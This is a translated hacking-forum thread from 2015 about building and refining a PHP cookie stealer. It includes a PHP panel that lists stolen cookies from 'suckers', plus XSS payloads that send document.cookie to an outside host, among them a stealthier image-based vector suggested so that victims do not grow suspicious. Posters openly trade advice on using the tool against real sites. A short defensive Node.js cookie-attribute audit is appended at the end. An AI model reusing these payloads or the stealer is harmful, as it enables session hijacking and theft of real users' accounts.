shadowSQLi (posted March 21, 2015; edited March 22, 2015 by shadowSQLi):
https://rstforums.com/forum/99145-php-cookie-stealer-version.rst#post619762

Sim Master (posted March 21, 2015):
Why do you use mysqli in one script and mysql_* in the other? And why does the SQL insert statement always have the same HTML code as the value for the ID field?

QUADMACHINE (posted March 21, 2015):
```php
<?php
//////////////////////
// Cookie stealer
//////////////////////

/* Database stuff */
define('host', ''); // localhost as usual
define('user', ''); // root, gigel or petrica
define('pass', ''); // the user's password
define('db', '');   // the database name

try {
    $db = new mysqli(host, user, pass, db);
} catch (mysqli_sql_exception $e) {
    throw $e;
}

if (isset($_GET['act']) && ($_GET['act'] == "prune")) {
    // Deletes results older than 30 days.
    $del_oldrecords = "DELETE FROM `cookies` WHERE `Date` < NOW() - INTERVAL 30 DAY";
    $db->query($del_oldrecords);
    $affected_rows = $db->affected_rows;
    print $affected_rows;
}

$cookie = "SELECT `ID`, `Cookie`, `IP`, `Date` FROM `cookies`";
$raw = $db->query($cookie);
if (!$raw) {
    die('There was an error running the query [' . $db->error . ']');
}
$values = $raw->fetch_all(MYSQLI_ASSOC);
$results = $raw->num_rows;

print 'Prune data: <a href="cookie.php?act=prune">Erase old data</a>';
print 'We\'ve stealed '.number_format($results).' cookies from suckers.';
foreach ($values as $key) {
    print '<tr><td>'.$key['ID'].'</td><td>'.$key['Cookie'].'</td><td>'.$key['IP'].'</td><td>'.$key['Date'].'</td></tr>';
}
?>
```

askwrite (posted March 22, 2015):
> Why do you use mysqli in one script and mysql_* in the other? And why does the SQL insert statement always have the same HTML code as the value for the ID field?
Because copy paste

activated (posted March 22, 2015):
Why is it that on some sites with XSS document.location="http://sitetau.com/cookie.php?shadow=" + document.cookie; works, and on others only document.location="http://sitetau.com/cookie.php?shadow=" works, that is, without document.cookie?

shadowSQLi (Author, posted March 22, 2015; edited March 22, 2015 by TheTime):
> Because copy paste
Where do you get the conclusion that I copied it? It's made by me; I only copied the connection to MySQL.
> Why do you use mysqli in one script and mysql_* in the other? And why does the SQL insert statement always have the same HTML code as the value for the ID field?
Because ID is set from phpMyAdmin to auto-increment.

Genius++ (posted March 22, 2015):
Is anyone making a video? Also, it would be cool if the script were executed from an image, such as a smiley.

shadowSQLi (Author, posted March 22, 2015):
> Is anyone making a video? Also, it would be cool if the script were executed from an image, such as a smiley.
I'll make one tonight, because right now I still have changes to make to the script, and I'm also trying to make a halfway decent design.

askwrite (posted March 22, 2015):
So what did you actually do, if you said you copied the SQL? Ah, you stored a GET...

shadowSQLi (Author, posted March 22, 2015):
> So what did you actually do, if you said you copied the SQL? Ah, you stored a GET...
11:16 AM - askwrite clicked Dislikes for this post: query SQL by shadowSQLi
11:14 AM - askwrite clicked Dislikes for this post: cookie stealer by shadowSQLi
11:14 AM - askwrite clicked Dislikes for this post: cookie stealer by shadowSQLi
11:14 AM - askwrite clicked Dislikes for this post: cookie stealer by shadowSQLi
11:14 AM - askwrite clicked Dislikes for this post: cookie stealer by shadowSQLi)

QUADMACHINE (posted March 22, 2015):
How frustrated; he dislikes everything in this thread. He's exactly like a yard dog: if someone invades his space, he bites anyone.

askwrite (posted March 22, 2015):
Ahahaha, so I'm the frustrated one, when you're the one who came here to suffer over a dislike given by mistake. The like/dislike buttons are there to be used.

QUADMACHINE (posted March 22, 2015):
And that's why I got 8 dislikes from you in 47 seconds, right? Because I'm suffering over one dislike? Chill ganja man, I've notified an administrator. Prepare ur anus!

shadowSQLi (Author, posted March 22, 2015; edited March 22, 2015 by shadowSQLi):
Demo: I'm making changes :D

TheTime (posted March 22, 2015):
I'm glad to see a few lines of code; you've made my Sunday nicer! You have a persistent XSS in the logs: you don't filter the received cookies at all. If you want to use the script for real, there's a chance others will try to find out who you are. If your script is vulnerable, you're gonna have a bad time! And set a password for accessing the logs.

shadowSQLi (Author, posted March 22, 2015):
> I'm glad to see a few lines of code; you've made my Sunday nicer! You have a persistent XSS in the logs: you don't filter the received cookies at all. If you want to use the script for real, there's a chance others will try to find out who you are. If your script is vulnerable, you're gonna have a bad time! And set a password for accessing the logs.
OK, thanks, I'll take care of it now :D

0xStrait (Active Members, posted March 22, 2015):
A better idea, so as not to redirect the person away from the page, is to use an image; the fact that the victim gets redirected to a page can raise suspicion.
<script>a=new Image();a.src="http://sitetau.com/cookie.php?shadow="+document.cookie;</script>

shadowSQLi (Author, posted March 22, 2015):
Done.. https://rstforums.com/forum/99145-php-cookie-stealer-version.rst#post619762
@0xStrait I posted your vector
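
The payloads posted in this thread depend on the session cookie being readable through document.cookie, which a site prevents by setting the HttpOnly attribute. As an added example (not code from any poster in the thread), this Node.js audit checks Set-Cookie header values for the attributes that limit script-based cookie theft; the header strings and function names are constructed for illustration.

```javascript
// Added example: audit Set-Cookie header values on the defending site.
// SAMPLE_HEADERS are constructed inputs, not captured traffic.
const SAMPLE_HEADERS = [
  'PHPSESSID=abc123; Path=/',
  'sid=xyz; Path=/; HttpOnly; Secure; SameSite=Lax',
  'theme=dark; Path=/; secure; samesite=None',
];

// Split one Set-Cookie value into the cookie name and its attributes.
// Attribute names are case-insensitive, so keys are lowercased.
function parseSetCookie(header) {
  const [pair, ...attrs] = header.split(';').map((p) => p.trim()).filter(Boolean);
  const eq = pair.indexOf('=');
  const name = eq === -1 ? pair : pair.slice(0, eq);
  const flags = {};
  for (const attr of attrs) {
    const i = attr.indexOf('=');
    const key = (i === -1 ? attr : attr.slice(0, i)).toLowerCase();
    flags[key] = i === -1 ? true : attr.slice(i + 1);
  }
  return { name, flags };
}

// Report which protective attributes a cookie lacks.
function auditCookie(header) {
  const { name, flags } = parseSetCookie(header);
  const issues = [];
  if (!flags.httponly) issues.push('missing HttpOnly: readable via document.cookie');
  if (!flags.secure) issues.push('missing Secure: sent over plain HTTP');
  const sameSite = String(flags.samesite || '').toLowerCase();
  if (!['lax', 'strict'].includes(sameSite)) {
    issues.push('SameSite not Lax/Strict: sent on cross-site requests');
  }
  return { name, issues };
}

// Names of cookies an injected script could read from document.cookie.
function scriptReadable(headers) {
  return headers.map(parseSetCookie).filter((c) => !c.flags.httponly).map((c) => c.name);
}

for (const h of SAMPLE_HEADERS) {
  const { name, issues } = auditCookie(h);
  console.log(name, issues.length ? issues : 'ok');
}
```
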